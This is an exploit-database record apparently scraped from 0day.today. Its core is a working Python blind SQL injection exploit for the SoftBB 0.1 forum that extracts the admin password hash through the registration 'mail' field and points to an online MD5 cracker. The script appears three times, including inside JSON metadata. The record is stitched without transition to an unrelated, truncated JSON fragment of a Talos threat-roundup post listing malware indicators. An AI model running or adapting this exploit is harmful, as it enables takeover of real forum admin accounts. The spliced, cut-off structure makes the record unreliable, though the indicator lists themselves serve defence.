ID 1337DAY-ID-313 Type zdt Reporter LOTFREE Modified 2006-03-19T00:00:00
Description
Exploit for unknown platform in category web applications
====================================================
SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit
====================================================
#!/usr/bin/env python
# LOTFREE TEAM 03/2006
#
# Vulnerability info
# Product : SoftBB
# Version : 0.1
#
# The field 'mail' in reg.php is used directly in a SQL query :
# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = "'.add_gpc($pseudoreg).'" OR mail = "'.$mail.'"';
# We can deduce deduce the result of some sql querys according to the error messages returned
# The exploit test the characters of the md5 hash one by one using a special query
import httplib, urllib
# Change the following values...
admin="admin"
server="localhost"
path="/forum"
#
hash=""
chars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')
print "LOTFREE TEAM SoftBB BruteForcing tool"
print "-------------------------------------"
for i in range(1,33):
print "Brute forcing hash["+str(i)+"]"
for a in chars:
params=urllib.urlencode({'pseudo':admin,
'mdp':'1',
'mdpc':'1',
'mail':'" union select pseudo,1 from softbb_membres where pseudo="'+admin+'" and substr(mdp,'+str(i)+',1)="'+a+'" limit 1,1#',
'condok':'true'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(server)
conn.request("POST", path+"/index.php?page=reg", params, headers)
response = conn.getresponse()
data = response.read()
conn.close()
if data.find("Ce pseudonyme est d")>0:
hash=hash+a
continue
print
if len(hash)==32:
print "Found hash =",hash,"for account",admin
print "You can use http://md5.rednoize.com/ to crack the md5 hash"
else:
print "Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request..."
# 0day.today [2018-04-08] #
{"hash": "5a6d9bc02059e02f6bb425fb98bbf1c2248925220598386f05745995738376b5", "id": "1337DAY-ID-313", "lastseen": "2018-04-08T03:48:39", "viewCount": 13, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "50a47ceef913d434f22954fddd4d17f6", "key": "href"}, {"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "modified"}, {"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "972a685222d80b5f31cd7681ea1e0282", "key": "reporter"}, {"hash": "b5c1da0433ca0ba4714fa2eb39ca01ba", "key": "sourceData"}, {"hash": "54f97fa4bd9d57e0ef5c8357f0de5090", "key": "sourceHref"}, {"hash": "620daa74aa74720370a4072e3f94f94c", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-04-08T03:48:39"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31559", "1337DAY-ID-31316", "1337DAY-ID-31303", "1337DAY-ID-30738", "1337DAY-ID-29439", "1337DAY-ID-28956", "1337DAY-ID-28870", "1337DAY-ID-28620"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150240", "PACKETSTORM:149776", "PACKETSTORM:149763", "PACKETSTORM:144882", "PACKETSTORM:144343"]}, {"type": "exploitdb", "idList": ["EDB-ID:45804", "EDB-ID:45590", "EDB-ID:45586", "EDB-ID:43120"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814003", "OPENVAS:1361412562310107303"]}, {"type": "zeroscience", "idList": ["ZSL-2018-5484"]}], "modified": "2018-04-08T03:48:39"}, "vulnersScore": -0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/313", "description": "Exploit for unknown platform in category web applications", "title": "SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit", "history": [{"bulletin": {"hash": "c2a1959cae489d899df2cf96645878e4eafe9007489fc4766c05a85ebf5c66fc", "id": "1337DAY-ID-313", "lastseen": "2016-04-19T01:43:26", "enchantments": {"score": {"value": 4.3, "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "modified": "2016-04-19T01:43:26"}}, "hashmap": [{"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "published"}, {"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3232317cfe2c5ea99deb5c0ad725ae13", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "82d3accbe6ba9f0180bc794abdc73aa7", "key": "sourceData"}, {"hash": "55fb51bdf8c7c4823c9e0414705ae7fd", "key": "href"}, {"hash": "620daa74aa74720370a4072e3f94f94c", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "972a685222d80b5f31cd7681ea1e0282", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/313", "description": "Exploit for unknown platform in category web applications", "viewCount": 2, "title": "SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nSoftBB 0.1 (mail) Remote Blind SQL Injection Exploit\r\n====================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# LOTFREE TEAM 03/2006\r\n#\r\n# Vulnerability info\r\n# Product : SoftBB\r\n# Version : 0.1\r\n#\r\n# The field 'mail' in reg.php is used directly in a SQL query :\r\n# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = \"'.add_gpc($pseudoreg).'\" OR mail = \"'.$mail.'\"';\r\n# We can deduce deduce the result of some sql querys according to the error messages returned\r\n# The exploit test the characters of the md5 hash one by one using a special query\r\nimport httplib, urllib\r\n\r\n# Change the following values...\r\nadmin=\"admin\"\r\nserver=\"localhost\"\r\npath=\"/forum\"\r\n#\r\nhash=\"\"\r\nchars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')\r\n\r\nprint \"LOTFREE TEAM SoftBB BruteForcing tool\"\r\nprint \"-------------------------------------\"\r\nfor i in range(1,33):\r\n print \"Brute forcing hash[\"+str(i)+\"]\"\r\n for a in chars:\r\n params=urllib.urlencode({'pseudo':admin,\r\n 'mdp':'1',\r\n 'mdpc':'1',\r\n 'mail':'\" union select pseudo,1 from softbb_membres where pseudo=\"'+admin+'\" and substr(mdp,'+str(i)+',1)=\"'+a+'\" limit 1,1#',\r\n 'condok':'true'})\r\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\", \"Accept\": \"text/plain\"}\r\n conn = httplib.HTTPConnection(server)\r\n conn.request(\"POST\", path+\"/index.php?page=reg\", params, headers)\r\n response = conn.getresponse()\r\n data = response.read()\r\n conn.close()\r\n if data.find(\"Ce pseudonyme est d\")>0:\r\n hash=hash+a\r\n continue\r\n\r\nprint\r\nif len(hash)==32:\r\n print \"Found hash =\",hash,\"for account\",admin\r\n print \"You can use http://md5.rednoize.com/ to crack the md5 hash\"\r\nelse:\r\n print \"Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request...\" \r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-03-19T00:00:00", "references": [], "reporter": "LOTFREE", "modified": "2006-03-19T00:00:00", "href": "http://0day.today/exploit/description/313"}, "lastseen": "2016-04-19T01:43:26", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nSoftBB 0.1 (mail) Remote Blind SQL Injection Exploit\r\n====================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# LOTFREE TEAM 03/2006\r\n#\r\n# Vulnerability info\r\n# Product : SoftBB\r\n# Version : 0.1\r\n#\r\n# The field 'mail' in reg.php is used directly in a SQL query :\r\n# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = \"'.add_gpc($pseudoreg).'\" OR mail = \"'.$mail.'\"';\r\n# We can deduce deduce the result of some sql querys according to the error messages returned\r\n# The exploit test the characters of the md5 hash one by one using a special query\r\nimport httplib, urllib\r\n\r\n# Change the following values...\r\nadmin=\"admin\"\r\nserver=\"localhost\"\r\npath=\"/forum\"\r\n#\r\nhash=\"\"\r\nchars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')\r\n\r\nprint \"LOTFREE TEAM SoftBB BruteForcing tool\"\r\nprint \"-------------------------------------\"\r\nfor i in range(1,33):\r\n print \"Brute forcing hash[\"+str(i)+\"]\"\r\n for a in chars:\r\n params=urllib.urlencode({'pseudo':admin,\r\n 'mdp':'1',\r\n 'mdpc':'1',\r\n 'mail':'\" union select pseudo,1 from softbb_membres where pseudo=\"'+admin+'\" and substr(mdp,'+str(i)+',1)=\"'+a+'\" limit 1,1#',\r\n 'condok':'true'})\r\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\", \"Accept\": \"text/plain\"}\r\n conn = httplib.HTTPConnection(server)\r\n conn.request(\"POST\", path+\"/index.php?page=reg\", params, headers)\r\n response = conn.getresponse()\r\n data = response.read()\r\n conn.close()\r\n if data.find(\"Ce pseudonyme est d\")>0:\r\n hash=hash+a\r\n continue\r\n\r\nprint\r\nif len(hash)==32:\r\n print \"Found hash =\",hash,\"for account\",admin\r\n print \"You can use http://md5.rednoize.com/ to crack the md5 hash\"\r\nelse:\r\n print \"Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request...\" \r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "published": "2006-03-19T00:00:00", "references": [], "reporter": "LOTFREE", "modified": "2006-03-19T00:00:00", "href": "https://0day.today/exploit/description/313"}
{"talosblog": [{"lastseen": "2019-11-01T19:01:48", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 25 and Nov. 1. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5dbc4d7341857.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.Trickbot-7367071-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts. \nWin.Dropper.Emotet-7365661-0 | Dropper | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019. \nWin.Trojan.DarkComet-7365618-1 | Trojan | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Packed.Zbot-7364099-0 | Packed | Zbot, also known as Zeus, is trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. \nWin.Malware.njRAT-7363922-1 | Malware | njRAT, also known as Bladabindi, is a RAT that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Trojan.Socks-7363151-0 | Trojan | Socks is a generic worm that spreads itself via autorun.inf files and downloads follow-on malware to infected systems. \nWin.Malware.Lokibot-7363866-1 | Malware | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails. \nWin.Packed.Zeroaccess-7358361-0 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns. \nWin.Ransomware.Shade-7357624-1 | Ransomware | Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.Trickbot-7367071-1\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 31 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]94[.]233[.]210` | 15 \n`192[.]3[.]104[.]46` | 11 \n`192[.]3[.]247[.]11` | 3 \n`172[.]82[.]152[.]126` | 2 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\Download http service` | 31 \n`%ProgramData%\\\u00d0\u00bc\u00d1\u2021\u00d0\u00b2\u00d0\u00b0\u00d0\u017e\u00d0\u00bd\u00d0\u00b3\u00d1\u02c6\u00d0\u00ac\u00d0\u203a\u00d0\u2019\u00d1\u2021\u00d1\u008f\u00d0\u00b9.dfxcsd` | 31 \n`%APPDATA%\\NuiGet` | 31 \n`%APPDATA%\\NuiGet\\settings.ini` | 31 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 27 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 27 \n \n#### File Hashes\n\n` 12e8006a018c424bcb76b7c97d880314c08f79d8951a545d92d73034f5778ec7 194f14146ed498074cb229f3941740463913e79bc4a08a765f2ffd490dfbbdd0 35030bca598f6d38bf753df2c51fa0b43a0189f44438728efd0b17027cb7d6f6 4a66279719169895ee353164bebd0d14aea7bd6588fe0d4cea242465b260a519 4e42cd765cf0ab37b5a1141d446607a672473d409a7da92a34a3add36ce1a8c7 4ea19a355329cbf55d60502bc479daae8664a0df0148b52d0096d0ea9df67626 5c49e59a65499989081ae896fd9748ef572315a3c064e63e246a670d1d292fe0 5efb96495538937fe47d41b0d7e98db37de61e6f593d349238286df075c1397c 686831b801833681a66bf8d26369358725d6eeb3d6a59dfba359d0cffc0a6879 6b63955ef70f2db59d37e4a9d1d8ea6160348a07075a63f3aba90344a4359870 6c59d5e1cbc381e8fabd6886b9202ccb8cb47fde6d197ef656ca9038d720562b 6d64abd7986e0caefe99c4c11f23ee79dc583b5ae8667b44b224cbc2ed5587db 71d6c8a2a0201af5013f6624738ca844095d6f50d7a31f105e60726d54589918 75cc6fafd3becff2a1dcb7e7a4b37542fe5fcd4f399d36ae5d5659336900b4fb 7acd91a84c5bea43ad99688a67760fd0826bc7d67b0de373292f06ecbe2d9297 81cb4e71e4327b1969f30625661c6e027c8e33cfc04be4acd20cbe3a913c236b 823e680c8c8b03a264a6cd347b84ee72913622f0bc675b18a0b3dbe0cb11422a 8d6e5a67290d22e5bb7e2beed6d83c67bb40455c3a2e27e802997aaa7f98760a 9123558e3b1d5f8041754f2bf41ed0f453d3a02da5979454f9f574efc6dc82ef 9373dd5aeea4258abed94cae3f4cf771b59714f6b7f31efb16394108cf3a9e2d 98dd50a96301fae6c07eafed51df1d5d1bd444a7920a076cc2a72bb483ae9542 a5dbee433d7d11dfff76b54e00c1879f969787f9b760908add1f89946381165e b9b992d27c996693b7d315b58a51a562e9c9286728fa162d0204fad15cc68a28 bd49f6d5e49f5dd45a38128ef576a86f1c447842d7a428ae08c7e33e321ed7aa c98366526022af2d7c17edf78d0bc5856aabebdf712f314574c6c9bc65454cd5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-r0YU7XD9ums/XbxaV0GHyjI/AAAAAAAAC3c/cLthlQKYfA8Pk0XsFPKoEZOlgFEuWOmSwCLcBGAsYHQ/s1600/bd49f6d5e49f5dd45a38128ef576a86f1c447842d7a428ae08c7e33e321ed7aa_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Emotet-7365661-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: Type ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: Start ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: ErrorControl ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: ImagePath ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: DisplayName ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: WOW64 ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: ObjectName ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: Description ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS ` | 168 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 168 \n`Global\\M98B68E3C` | 168 \n`Global\\<random guid>` | 3 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`167[.]99[.]105[.]223` | 77 \n`54[.]38[.]94[.]197` | 59 \n`176[.]31[.]200[.]130` | 54 \n`74[.]202[.]142[.]71` | 52 \n`173[.]194[.]68[.]108/31` | 48 \n`190[.]182[.]161[.]7` | 48 \n`186[.]159[.]246[.]121` | 43 \n`190[.]229[.]205[.]11` | 41 \n`79[.]143[.]182[.]254` | 41 \n`62[.]149[.]157[.]55` | 35 \n`178[.]128[.]148[.]110` | 34 \n`212[.]129[.]24[.]79` | 34 \n`62[.]149[.]128[.]179` | 33 \n`176[.]9[.]47[.]53` | 31 \n`74[.]202[.]142[.]33` | 31 \n`62[.]149[.]152[.]151` | 31 \n`62[.]149[.]128[.]200/30` | 29 \n`17[.]36[.]205[.]74` | 27 \n`62[.]149[.]128[.]72/30` | 26 \n`191[.]252[.]112[.]194/31` | 25 \n`185[.]94[.]252[.]27` | 24 \n`45[.]55[.]82[.]2` | 24 \n`37[.]187[.]5[.]82` | 24 \n`200[.]206[.]34[.]68` | 24 \n`172[.]217[.]10[.]243` | 23 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]prodigy[.]net[.]mx` | 51 \n`mail[.]aruba[.]it` | 35 \n`smtp[.]infinitummail[.]com` | 33 \n`pop3s[.]aruba[.]it` | 33 \n`imail[.]dahnaylogix[.]com` | 31 \n`smtp[.]alestraune[.]net[.]mx` | 31 \n`mail[.]pec[.]aruba[.]it` | 31 \n`smtp[.]pec[.]aruba[.]it` | 31 \n`mail[.]outlook[.]com` | 27 \n`smtpout[.]secureserver[.]net` | 27 \n`pop3s[.]pec[.]aruba[.]it` | 26 \n`mail[.]cemcol[.]hn` | 19 \n`smtp[.]secureserver[.]net` | 18 \n`smtp[.]orange[.]fr` | 17 \n`ssl0[.]ovh[.]net` | 17 \n`as1r1066[.]servwingu[.]mx` | 15 \n`imaps[.]aruba[.]it` | 15 \n`outlook[.]office365[.]com` | 14 \n`mail[.]tiscali[.]it` | 14 \n`mail[.]singnet[.]com[.]sg` | 13 \n`mail[.]libero[.]it` | 13 \n`mbox[.]cert[.]legalmail[.]it` | 13 \n`mail[.]funfruit[.]com[.]mx` | 13 \n`mail[.]caoa[.]com[.]br` | 13 \n`smtp[.]outlook[.]com` | 12 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\xcsdwrsdk.dtxsd` | 91 \n`%ProgramData%\\dxcsdyjgbn.dfxcsd` | 77 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 56 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 56 \n`%SystemRoot%\\SysWOW64\\chinesesongsa.exe` | 6 \n`%SystemRoot%\\SysWOW64\\chinesesongsb.exe` | 3 \n`%ProgramData%\\Len350p.exe` | 1 \n`%ProgramData%\\uUgG1WJQ4usO.exe` | 1 \n`\\TEMP\\PpoNLODk9uCChTGo9HH.exe` | 1 \n`%SystemRoot%\\TEMP\\543E.tmp` | 1 \n`\\TEMP\\h5xs_232.exe` | 1 \n`\\TEMP\\R53Pew.exe` | 1 \n`\\TEMP\\o86t6prpvay0ah3.exe` | 1 \n`\\TEMP\\hw8ah6hmp5ku.exe` | 1 \n`\\TEMP\\scsl_2153.exe` | 1 \n`\\TEMP\\1p3gf.exe` | 1 \n`\\TEMP\\xk3wdb8t.exe` | 1 \n`\\TEMP\\067vnss8y_680.exe` | 1 \n`\\TEMP\\ypb8jo5.exe` | 1 \n`\\TEMP\\41v2241jicyu8m8.exe` | 1 \n`\\TEMP\\8aklv68ynf.exe` | 1 \n`%SystemRoot%\\TEMP\\2086.tmp` | 1 \n`%SystemRoot%\\TEMP\\2096.tmp` | 1 \n`\\TEMP\\wealxtx4234pz0.exe` | 1 \n`\\TEMP\\RlwZ7vqPWQOoRg.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0299861a3cdc50a555b8d327b8cdbe9ebb3d286bd67d34fd78e82910ba0a69da 02e0225c00b4f47728a493dbad00964ff4e2f975312d2fdccb5fee836b8e02a7 04242859c480e5af73f938324355a7058c209a29bd90cdc9c03095da158aafb6 04edae27709686fe0eec70970a0bb0073e1e573ed64341705545068b789eda9b 068c2726caca44b77e7ee220fb4d181d086dbf433c76b588297477ac5689d572 0704a26d82961ffcc14aa5f1ca3df6be3cd09cd4a27580ecff7eea8f6b70f7e2 078d578cfbb4ea91813381500b1d4b56106bb4c73b30697b6f9cc6bc46727251 0b1bb755d31acfd314aa59b362818f89afee12840cffa7665b9a21c909249e73 0c15940c4c9a49103c2e0b33cb1488a8838aa905dddc2a53e841e5be07a1cfe3 0df437e357d886397345b7bcebd48a4404c6c923758ea30bd286fbf786531771 100ed9e984af228f4c63f6e389066f244a146a07a24a98b2ef5737484f8b9418 10cb59a28331f74a3eb14a688be158aa83ad848a29b42e9b5e69f210470004af 10dd8ab62c73328905f71435a19e2fbd4c0b3c0bfb9c62e499ce321cd455e03d 11b968a43e6f27e16c73887a56b9e04315caa0ea36ccce003411ebeb83bfb28c 11cec37f15cb1f81608912172d843502b3e74c3cf5a6002b1d186b08c561556f 12e8a80c47ac89a43c220db77cd56b746284d8fb08b0544d0b5642ff01d42c31 186d8fc5e47032b99b15b3e64d5df4427d2d89dd8a0fc08e720800f5715f1f69 19dec17408be3e2a980e50f038d4563911a0a3b315085db29b1cce06415902ce 1a24c713e52fc6072e7586ecd2ab3e858b03c893e463aae8c678c05c3b493be7 1ada1f15d5e4b2a7b67a8ee63ddb8ffbd15c2a2299977f3ff0f26f557e3d1ed8 1c80dd78b374786cd12cb3c466a69faef4b336b31b88259f735ae90a590151d6 217b0f8c66870cd11d7e6d22125e4afbb2ae711154a5ea7f56c40a02e7d6edfa 229b1494c66f15a919697f70307f34e082b77e53b4ec35b0425e5a1cac4665a2 23699f526439964cce4a8e8c9c5f27a4549bd7bb0293cae683e84730e20887ca 24d0044976a4122a3fcfedad6f66849eb0d1d9fa7fb7f7ad52bf0a9d97f394b5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-o2TmvVaFldY/XbxcOZ7C8jI/AAAAAAAAC3o/wBR9xuN1kEgLxbuiY9qtUwgF8jcSIOSKgCLcBGAsYHQ/s1600/186d8fc5e47032b99b15b3e64d5df4427d2d89dd8a0fc08e720800f5715f1f69_amp.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-DYIS3fPk8sU/XbxcUlEAj-I/AAAAAAAAC3s/6HXf9kmfiXknSOCXVA3SxeaYjBj-CKDFQCLcBGAsYHQ/s1600/9b2a21c2d7563157b968e798f7a289c4010230532569a61638c6dabe9585b7db_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.DarkComet-7365618-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: java ` | 25 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-6ZFK11A` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`mrsnickers03[.]no-ip[.]biz` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\dclogs` | 25 \n`%APPDATA%\\IDM` | 25 \n`%APPDATA%\\IDM\\ichader.exe` | 25 \n`%TEMP%\\WTHTE.bat` | 2 \n`%TEMP%\\WTHTE.txt` | 2 \n`%TEMP%\\SXIJG.txt` | 1 \n`%TEMP%\\PTQEQ.bat` | 1 \n`%TEMP%\\PTQEQ.txt` | 1 \n`%TEMP%\\USQVI.bat` | 1 \n`%TEMP%\\USQVI.txt` | 1 \n`%TEMP%\\CQGTP.bat` | 1 \n`%TEMP%\\CQGTP.txt` | 1 \n`%TEMP%\\NKKWS.bat` | 1 \n`%TEMP%\\NKKWS.txt` | 1 \n`%TEMP%\\WAXFT.bat` | 1 \n`%TEMP%\\WAXFT.txt` | 1 \n`%TEMP%\\JRFQG.bat` | 1 \n`%TEMP%\\JRFQG.txt` | 1 \n`%TEMP%\\APQNW.bat` | 1 \n`%TEMP%\\APQNW.txt` | 1 \n`%TEMP%\\UVJWH.bat` | 1 \n`%TEMP%\\UVJWH.txt` | 1 \n`%TEMP%\\OSNVJ.bat` | 1 \n`%TEMP%\\OSNVJ.txt` | 1 \n`%TEMP%\\MUISJ.bat` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0d35dc067583af9f8ec8aa97a0ffafc8a92c52145196755eff63f62fd545da80 4671622ecb23629041c6f808461e60b20692ba4920d7207442db3e0bb2f9cb43 560532abb05b4b9219c6206d02defb4ce74f0f07be27173257df016e2576e0c1 5b6a3069e1fdad0d43dea5e289a41ea3a76c2583990f070368394154339dc682 60fda48fabb1047741a46cb1989b1ed5a49fa8214955e328d9b9e0825bd06dae 76f99c94e4cb98ecb947dc0add432659cf9510cf0ff75dd532af16f68ca70612 7c15a840a3f2bd987e096d3810991e4f88fe65c9ba6efff2529c1608dfd39e34 7e18585cff88ab47bbdc0d2f9c76ade0d12cf1431983864c260ada790aee3afa 82648de7b9a19b4e1a23933f5c5a24991365fdd97bdb03d0cd95431f38df0b23 842e707c9400e589df5e4be6ec72454403fee00adb174c54b2f2dea3ac1d69d5 85faf6824e603e5bff1ec4e743bd944f2cfdca0098920cbf66467e4d24d8d919 87411b5aee6a4ca4f671b44e63cc9a8e0fc27ed2b43a843cfbe904c428420668 897e054816e7d69c51c73b843c0def266858d0f0eb50425930f975416210868c 8d8821ca5999ec65308100e8a4d7e3bdfe850783161c925789149394f1e071a5 91da6fab3b8e86ba31a0c36eb37787c5bd3723d2f452b59ec5ecac8431a721a3 937d56fae295a0647c6bcea2db66a1f33aefe91db3ab8bb04979ad745d5cd18d 94ac600212f0cb12d2dfb7f2e5a5814160226fa0cd2d545dd2ab32f3057fc92d 9a5b643414e9a3b2b0768123f6c2039c06ec39a1f647201cf284c1785809be2d 9db56c0d7979b0ec84776064129b1a2354d9d3b13f09cff625b106a230fc0caa a4d07da8c28394c58f19e8a7ffb8505386ef714efd4fe9f9d096462233cb7e87 a72e5af5e928da722ded5dee33dba92c9ff07b4c5a7cfdd083c60bc4c6ca6dd3 a7f813ece9b9f797ff84d1d13294892e499ba36e442a118f7f08a3499671e449 a9fc7d3f2b74b0640102d091bd79e5f98887e4bb43ad8bf153cd2e477b67dba6 b13881418dc9d5f70d4ed4da6188806132e6b9d4c7cfa45a6dd426203db5f797 b28117f5e719f5e2c419a9fd0569d40729442d1cff822b1644379986e29c9c50 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A 